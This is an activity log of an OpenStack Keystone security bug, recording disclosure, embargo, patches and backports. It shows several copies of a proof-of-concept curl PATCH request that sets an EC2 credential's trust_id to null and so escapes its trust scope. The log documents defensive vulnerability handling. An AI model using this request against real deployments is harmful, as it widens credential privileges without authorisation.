Activity log for bug #1872755

Date Who What changed Old value New value Message
2020-04-14 15:51:32 kay bug added bug
2020-04-14 15:52:08 kay description Similar to https://bugs.launchpad.net/keystone/+bug/1872733. If ec2 credentials were created within a trust_id scope, it is still possible to set these credentials' "trust_id" to "null" using: curl -X PATCH https://keystone/v3/credentials/3c2b3265350c6da3a18a143fbe975ca4a8ed88a6f8c6dacc2494a5c1287ba66f -H 'Accept: application/json' -H 'Content-Type: application/json' -H "X-Auth-Token: ***" -d'{ "credential": { "blob": "{\"access\": \"ffe6fc21b47c4d87befc95ad070c3b7a\", \"secret\": \"530196cd097e4a7ca9df7258aa89ff0e\", \"trust_id\": null}" } }' Note "null" in blob. Similar to https://bugs.launchpad.net/keystone/+bug/1872733 and https://bugs.launchpad.net/keystone/+bug/1872753. If ec2 credentials were created within a trust_id scope, it is still possible to set these credentials' "trust_id" to "null" using: curl -X PATCH https://keystone/v3/credentials/3c2b3265350c6da3a18a143fbe975ca4a8ed88a6f8c6dacc2494a5c1287ba66f -H 'Accept: application/json' -H 'Content-Type: application/json' -H "X-Auth-Token: ***" -d'{   "credential": {     "blob": "{\"access\": \"ffe6fc21b47c4d87befc95ad070c3b7a\", \"secret\": \"530196cd097e4a7ca9df7258aa89ff0e\", \"trust_id\": null}"   } }' Note "null" in blob.
2020-04-14 16:09:51 Jeremy Stanley description Similar to https://bugs.launchpad.net/keystone/+bug/1872733 and https://bugs.launchpad.net/keystone/+bug/1872753. If ec2 credentials were created within a trust_id scope, it is still possible to set these credentials' "trust_id" to "null" using: curl -X PATCH https://keystone/v3/credentials/3c2b3265350c6da3a18a143fbe975ca4a8ed88a6f8c6dacc2494a5c1287ba66f -H 'Accept: application/json' -H 'Content-Type: application/json' -H "X-Auth-Token: ***" -d'{   "credential": {     "blob": "{\"access\": \"ffe6fc21b47c4d87befc95ad070c3b7a\", \"secret\": \"530196cd097e4a7ca9df7258aa89ff0e\", \"trust_id\": null}"   } }' Note "null" in blob. This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. This embargo shall not extend past 2020-07-13 and will be made public by or on that date if no fix is identified. Similar to https://bugs.launchpad.net/keystone/+bug/1872733 and https://bugs.launchpad.net/keystone/+bug/1872753. If ec2 credentials were created within a trust_id scope, it is still possible to set these credentials' "trust_id" to "null" using: curl -X PATCH https://keystone/v3/credentials/3c2b3265350c6da3a18a143fbe975ca4a8ed88a6f8c6dacc2494a5c1287ba66f -H 'Accept: application/json' -H 'Content-Type: application/json' -H "X-Auth-Token: ***" -d'{   "credential": {     "blob": "{\"access\": \"ffe6fc21b47c4d87befc95ad070c3b7a\", \"secret\": \"530196cd097e4a7ca9df7258aa89ff0e\", \"trust_id\": null}"   } }' Note "null" in blob.
2020-04-14 16:10:09 Jeremy Stanley bug task added ossa
2020-04-14 16:10:22 Jeremy Stanley ossa: status New Incomplete
2020-04-14 16:10:34 Jeremy Stanley bug added subscriber Keystone Core security contacts
2020-04-14 20:51:29 Colleen Murphy attachment added ec2.example https://bugs.launchpad.net/keystone/+bug/1872755/+attachment/5354152/+files/ec2.example
2020-04-15 18:57:21 Colleen Murphy keystone: status New Triaged
2020-04-15 18:57:25 Colleen Murphy keystone: importance Undecided Medium
2020-04-16 19:44:39 Colleen Murphy attachment added 0002-Prohibit-users-from-PATCHing-metadata-in-EC2-cred.patch https://bugs.launchpad.net/keystone/+bug/1872755/+attachment/5355721/+files/0002-Prohibit-users-from-PATCHing-metadata-in-EC2-cred.patch
2020-04-17 15:16:16 Colleen Murphy attachment added 0002-Prohibit-users-from-PATCHing-metadata-in-EC2-cred.patch https://bugs.launchpad.net/keystone/+bug/1872755/+attachment/5356205/+files/0002-Prohibit-users-from-PATCHing-metadata-in-EC2-cred.patch
2020-04-21 17:06:04 Colleen Murphy keystone: milestone ussuri-rc1
2020-04-27 16:52:32 Colleen Murphy keystone: status Triaged In Progress
2020-04-27 16:52:38 Colleen Murphy keystone: milestone ussuri-rc1
2020-04-27 16:53:15 Colleen Murphy keystone: assignee Colleen Murphy (krinkle)
2020-05-01 22:03:53 Gage Hugo bug added subscriber Mohammed Naser
2020-05-01 22:09:14 Gage Hugo bug added subscriber Nick Tait
2020-05-06 15:10:17 Gage Hugo description This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. This embargo shall not extend past 2020-07-13 and will be made public by or on that date if no fix is identified. Similar to https://bugs.launchpad.net/keystone/+bug/1872733 and https://bugs.launchpad.net/keystone/+bug/1872753. If ec2 credentials were created within a trust_id scope, it is still possible to set these credentials' "trust_id" to "null" using: curl -X PATCH https://keystone/v3/credentials/3c2b3265350c6da3a18a143fbe975ca4a8ed88a6f8c6dacc2494a5c1287ba66f -H 'Accept: application/json' -H 'Content-Type: application/json' -H "X-Auth-Token: ***" -d'{   "credential": {     "blob": "{\"access\": \"ffe6fc21b47c4d87befc95ad070c3b7a\", \"secret\": \"530196cd097e4a7ca9df7258aa89ff0e\", \"trust_id\": null}"   } }' Note "null" in blob. Similar to https://bugs.launchpad.net/keystone/+bug/1872733 and https://bugs.launchpad.net/keystone/+bug/1872753. If ec2 credentials were created within a trust_id scope, it is still possible to set these credentials' "trust_id" to "null" using: curl -X PATCH https://keystone/v3/credentials/3c2b3265350c6da3a18a143fbe975ca4a8ed88a6f8c6dacc2494a5c1287ba66f -H 'Accept: application/json' -H 'Content-Type: application/json' -H "X-Auth-Token: ***" -d'{   "credential": {     "blob": "{\"access\": \"ffe6fc21b47c4d87befc95ad070c3b7a\", \"secret\": \"530196cd097e4a7ca9df7258aa89ff0e\", \"trust_id\": null}"   } }' Note "null" in blob.
2020-05-06 15:10:21 Gage Hugo information type Private Security Public Security
2020-05-06 15:31:13 Edouard Dausque bug added subscriber Edouard Dausque
2020-05-06 22:45:41 Jeremy Stanley tags security
2020-05-06 22:45:47 Jeremy Stanley information type Public Security Public
2020-05-06 22:45:53 Jeremy Stanley ossa: status Incomplete Won't Fix
2020-05-07 19:53:05 OpenStack Infra tags security in-stable-ussuri security
2020-05-08 16:14:59 OpenStack Infra keystone: status In Progress Fix Released
2020-05-11 05:38:40 OpenStack Infra tags in-stable-ussuri security in-stable-train in-stable-ussuri security
2020-05-11 20:02:06 OpenStack Infra tags in-stable-train in-stable-ussuri security in-stable-stein in-stable-train in-stable-ussuri security
2020-05-13 17:14:46 OpenStack Infra tags in-stable-stein in-stable-train in-stable-ussuri security in-stable-rocky in-stable-stein in-stable-train in-stable-ussuri security
2020-05-14 22:09:39 OpenStack Infra tags in-stable-rocky in-stable-stein in-stable-train in-stable-ussuri security in-stable-queens in-stable-rocky in-stable-stein in-stable-train in-stable-ussuri security
2020-06-04 20:12:50 OpenStack Infra tags in-stable-queens in-stable-rocky in-stable-stein in-stable-train in-stable-ussuri security in-stable-pike in-stable-queens in-stable-rocky in-stable-stein in-stable-train in-stable-ussuri security